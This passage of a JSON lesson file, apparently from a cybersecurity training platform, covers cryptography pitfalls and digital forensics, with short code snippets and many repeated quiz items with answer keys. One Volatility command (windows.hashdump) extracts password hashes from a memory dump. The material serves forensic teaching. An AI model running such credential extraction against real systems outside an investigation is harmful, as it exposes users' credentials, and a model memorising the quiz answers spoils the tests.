exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"kdf","cat":"Cryptography","title":"Key Derivation Functions","diff":2,"xp":125,"intro":"Derive keys from passwords.","sections":[{"type":"text","content":"Derive keys from passwords."},{"type":"code","lang":"python","content":"key=hashlib.pbkdf2_hmac('sha256',b'password',salt,100000,dklen=32)"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"KDF purpose?","opts":["Compress","Derive strong key from weak password","Hash files","Random numbers"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"side-channel","cat":"Cryptography","title":"Side-Channel Attacks","diff":3,"xp":250,"intro":"Timing, power, EM leaks.","sections":[{"type":"text","content":"Timing, power, EM leaks."},{"type":"code","lang":"python","content":"# Timing attack on char-by-char comparison\nimport hmac\nhmac.compare_digest(a,b)  # constant-time"},{"type":"text","content":"Most crypto failures aren't broken algorithms. They're implementation mistakes: reused keys, weak randomness, wrong modes. Understanding pitfalls matters more than math."},{"type":"tip","content":"Never roll your own crypto. Use tested libraries. The difference between secure and broken is often one parameter: ECB vs GCM, MD5 vs Argon2."},{"type":"task","content":"Encrypt a file with AES-GCM, then intentionally break it: try ECB, reuse a nonce, tamper with ciphertext. Understanding failures teaches more than success."},{"type":"quiz","q":"Side-channel exploits?","opts":["Network","Physical measurements (time, power, EM)","Source code","Logs"],"ans":1},{"type":"quiz","q":"AES is which type of cipher?","opts":["Asymmetric","Symmetric block cipher","Hash function","Stream cipher"],"ans":1},{"type":"quiz","q":"The key size of AES-256 is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB mode weakness is...","opts":["Slow speed","Identical blocks produce identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"CBC mode requires...","opts":["No IV","An initialization vector (IV)","Two keys","A hash function"],"ans":1},{"type":"quiz","q":"MD5 is considered...","opts":["Secure for passwords","Broken (collision attacks exist)","The strongest hash","Symmetric encryption"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What is a nonce?","opts":["A password","A number used once (prevents replay)","A type of cipher","A key exchange protocol"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","A hash function with a secret key","Two passwords","Symmetric and asymmetric encryption"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is used for...","opts":["Encryption","Key exchange over insecure channel","Hashing","Digital signatures"],"ans":1},{"type":"quiz","q":"A digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Algorithm speed"],"ans":1},{"type":"quiz","q":"What makes bcrypt good for passwords?","opts":["It's fast","It's deliberately slow (adjustable cost)","It's reversible","It uses short keys"],"ans":1},{"type":"quiz","q":"AES is...","opts":["Asymmetric","Symmetric block cipher","Hash","Stream cipher"],"ans":1},{"type":"quiz","q":"AES-256 key is...","opts":["128 bits","192 bits","256 bits","512 bits"],"ans":2},{"type":"quiz","q":"ECB weakness is...","opts":["Speed","Identical blocks = identical ciphertext","Key exposure","No padding"],"ans":1},{"type":"quiz","q":"MD5 is...","opts":["Secure","Broken (collisions exist)","Strongest","Symmetric"],"ans":1},{"type":"quiz","q":"HMAC combines...","opts":["Two ciphers","Hash + secret key","Two passwords","Symmetric + asymmetric"],"ans":1},{"type":"quiz","q":"Diffie-Hellman is for...","opts":["Encryption","Key exchange","Hashing","Signatures"],"ans":1},{"type":"quiz","q":"Digital signature proves...","opts":["Encryption strength","Authenticity and integrity","Key length","Speed"],"ans":1},{"type":"quiz","q":"bcrypt is good because...","opts":["Fast","Deliberately slow","Reversible","Short keys"],"ans":1},{"type":"quiz","q":"PGP stands for...","opts":["Pretty Good Privacy","Personal Guard Protocol","Private Gateway","Protected Purpose"],"ans":0},{"type":"quiz","q":"SHA-256 output is...","opts":["128 bits","256 bits","512 bits","64 bits"],"ans":1}]},{"id":"mem-forensics","cat":"Forensics & IR","title":"Memory Forensics","diff":2,"xp":150,"intro":"Analyze RAM dumps.","sections":[{"type":"text","content":"Analyze RAM dumps."},{"type":"code","lang":"bash","content":"vol3 -f mem.dmp windows.pslist\nvol3 -f mem.dmp windows.hashdump\nvol3 -f mem.dmp windows.malfind"},{"type":"text","content":"Digital forensics is detective work with data. Every action on a computer leaves traces \u2014 in memory, on disk, in logs, and across the network. The challenge is knowing where to look, preserving the evidence properly, and reconstructing the timeline of what happened. Good forensics tells a complete story."},{"type":"tip","content":"Follow the order of volatility: capture the most volatile evidence first (RAM, network connections, running processes), then work down to disk. Never work on the original evidence \u2014 always create a forensic copy first and verify its integrity with hashes."},{"type":"task","content":"Download a forensic challenge image from Digital Corpora or NIST CFReDS. Practice the full workflow: image the disk, verify the hash, mount read-only, create a timeline with Plaso, identify suspicious activity, and write an incident report with your findings and conclusions."},{"type":"quiz","q":"Standard memory forensics tool?","opts":["Autopsy","Volatility","FTK","EnCase"],"ans":1},{"type":"quiz","q":"Volatile evidence should be collected...","opts":["Last","First (before it disappears)","Never","After the investigation"],"ans":1},{"type":"quiz","q":"A disk image should be...","opts":["Compressed","A bit-for-bit exact copy","Encrypted","Partial"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"disk-forensics","cat":"Forensics & IR","title":"Disk Forensics","diff":1,"xp":100,"intro":"Acquire and analyze disks.","sections":[{"type":"text","content":"Acquire and analyze disks."},{"type":"code","lang":"bash","content":"dd if=/dev/sda of=disk.img bs=4M\nmount -o ro,loop disk.img /mnt"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Why mount read-only?","opts":["Speed","Preserve evidence integrity","Compression","Compatibility"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["The suspect is guilty","Evidence integrity was maintained","The investigation is complete","Tools were updated"],"ans":1},{"type":"quiz","q":"Volatility analyzes...","opts":["Network traffic","Memory dumps","Disk images","Log files"],"ans":1},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"log-analysis","cat":"Forensics & IR","title":"Log Analysis","diff":1,"xp":100,"intro":"Analyze logs for IOCs.","sections":[{"type":"text","content":"Analyze logs for IOCs."},{"type":"code","lang":"bash","content":"grep 'Failed password' /var/log/auth.log\nGet-WinEvent -FilterHashtable @{LogName='Security';Id=4625}"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Failed login event ID?","opts":["4624","4625","4688","4672"],"ans":1},{"type":"quiz","q":"The most volatile evidence type is...","opts":["Disk files","RAM contents","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Volatile evidence should be collected...","opts":["Last","First (before it disappears)","Never","After the investigation"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"net-forensics","cat":"Forensics & IR","title":"Network Forensics","diff":2,"xp":150,"intro":"Analyze packet captures.","sections":[{"type":"text","content":"Analyze packet captures."},{"type":"code","lang":"bash","content":"tshark -r capture.pcap -Y 'http.request' -T fields -e http.host"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"PCAP analysis GUI?","opts":["tcpdump","Wireshark","nmap","netcat"],"ans":1},{"type":"quiz","q":"A disk image should be...","opts":["Compressed","A bit-for-bit exact copy","Encrypted","Partial"],"ans":1},{"type":"quiz","q":"Chain of custody proves...","opts":["The suspect is guilty","Evidence integrity was maintained","The investigation is complete","Tools were updated"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"The USN Journal records...","opts":["User logins","File system changes (creates, deletes, renames)","Network connections","Process execution"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"malware-basics","cat":"Forensics & IR","title":"Malware Analysis Basics","diff":2,"xp":150,"intro":"Static and dynamic analysis.","sections":[{"type":"text","content":"Static and dynamic analysis."},{"type":"code","lang":"bash","content":"file suspicious.exe\nstrings suspicious.exe | grep -i 'http|password'"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Static analysis means?","opts":["Running it","Examining WITHOUT executing","Network analysis","Memory"],"ans":1},{"type":"quiz","q":"Volatility analyzes...","opts":["Network traffic","Memory dumps","Disk images","Log files"],"ans":1},{"type":"quiz","q":"The most volatile evidence type is...","opts":["Disk files","RAM contents","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Evidence integrity is verified using...","opts":["File size comparison","Cryptographic hash comparison","Visual inspection","File name matching"],"ans":1},{"type":"quiz","q":"Malware sandboxing means...","opts":["Deleting malware","Running it in an isolated environment to observe behavior","Encrypting it","Reverse engineering"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Order of volatility: what's collected first?","opts":["Hard drive","RAM and running processes","Backups","Paper documents"],"ans":1},{"type":"quiz","q":"Write-blocking prevents...","opts":["Reading the disk","Accidentally modifying evidence","Network access","Encryption"],"ans":1},{"type":"quiz","q":"Which tool carves deleted files?","opts":["nmap","foremost / scalpel","Burp Suite","Metasploit"],"ans":1},{"type":"quiz","q":"Windows Prefetch files prove...","opts":["File contents","A program was executed (and when)","Network connections","User passwords"],"ans":1},{"type":"quiz","q":"NTFS $MFT records...","opts":["Network traffic","Metadata for every file on the volume","User logins","Registry changes"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"reverse-eng","cat":"Forensics & IR","title":"Reverse Engineering","diff":2,"xp":175,"intro":"Disassemble binaries.","sections":[{"type":"text","content":"Disassemble binaries."},{"type":"code","lang":"bash","content":"# Ghidra: Import \u2192 Analyze \u2192 Decompile\nr2 binary; aaa; pdf @main"},{"type":"text","content":"Every computer action leaves traces: memory, disk, logs, network. The challenge is knowing where to look, preserving evidence, and reconstructing the timeline."},{"type":"tip","content":"Follow order of volatility: RAM first, then network state, then disk. Never work on original evidence. Always use forensic copies verified with hashes."},{"type":"task","content":"Download a forensic challenge from Digital Corpora. Practice: image, verify hash, mount read-only, create timeline, identify suspicious activity, write report."},{"type":"quiz","q":"Free IDA alternative?","opts":["OllyDbg","Ghidra","x64dbg","WinDbg"],"ans":1},{"type":"quiz","q":"Volatile evidence should be collected...","opts":["Last","First (before it disappears)","Never","After the investigation"],"ans":1},{"type":"quiz","q":"A disk image should be...","opts":["Compressed","A bit-for-bit exact copy","Encrypted","Partial"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Event ID 4624 in Windows means...","opts":["Failed login","Successful logon","Account created","Password changed"],"ans":1},{"type":"quiz","q":"Autopsy is a tool for...","opts":["Network scanning","Digital forensic analysis of disk images","Password cracking","Vulnerability assessment"],"ans":1},{"type":"quiz","q":"Strings analysis extracts...","opts":["Encryption keys","Readable text from binary files","Network packets","Registry hives"],"ans":1},{"type":"quiz","q":"An incident response plan should be created...","opts":["During an incident","After an incident","Before any incident","Never"],"ans":2},{"type":"quiz","q":"Containment in IR means...","opts":["Deleting evidence","Isolating affected systems to prevent spread","Shutting down the company","Paying the ransom"],"ans":1},{"type":"quiz","q":"Indicators of Compromise (IOCs) include...","opts":["Company policies","Malicious IPs, domains, file hashes","Employee names","Software licenses"],"ans":1},{"type":"quiz","q":"PCAP files contain...","opts":["Passwords","Captured network packets","Disk images","Memory dumps"],"ans":1},{"type":"quiz","q":"Most volatile evidence?","opts":["Disk","RAM and registers","Backups","Paper"],"ans":1},{"type":"quiz","q":"Write-blocker prevents...","opts":["Reading","Modifying evidence","Network","Encryption"],"ans":1},{"type":"quiz","q":"File carving finds files by...","opts":["Filenames","File headers (magic bytes)","Extensions","Directory entries"],"ans":1},{"type":"quiz","q":"Prefetch proves...","opts":["File contents","Program execution and timing","Network","Passwords"],"ans":1},{"type":"quiz","q":"$MFT records...","opts":["Network traffic","Metadata for every NTFS file","Logins","Registry"],"ans":1},{"type":"quiz","q":"IR starts with...","opts":["Eradication","Preparation","Recovery","Deletion"],"ans":1},{"type":"quiz","q":"IOC stands for...","opts":["Input Output","Indicator of Compromise","Internet Operations","Internal Check"],"ans":1},{"type":"quiz","q":"PCAP contains...","opts":["Passwords","Captured network packets","Disk images","Memory"],"ans":1},{"type":"quiz","q":"Event 4624 means...","opts":["Failed login","Successful logon","Account created","Password change"],"ans":1},{"type":"quiz","q":"Autopsy is for...","opts":["Network scanning","Forensic disk analysis","Password cracking","Vuln assessment"],"ans":1}]},{"id":"ir-process","cat":"Forensics & IR","title":"IR 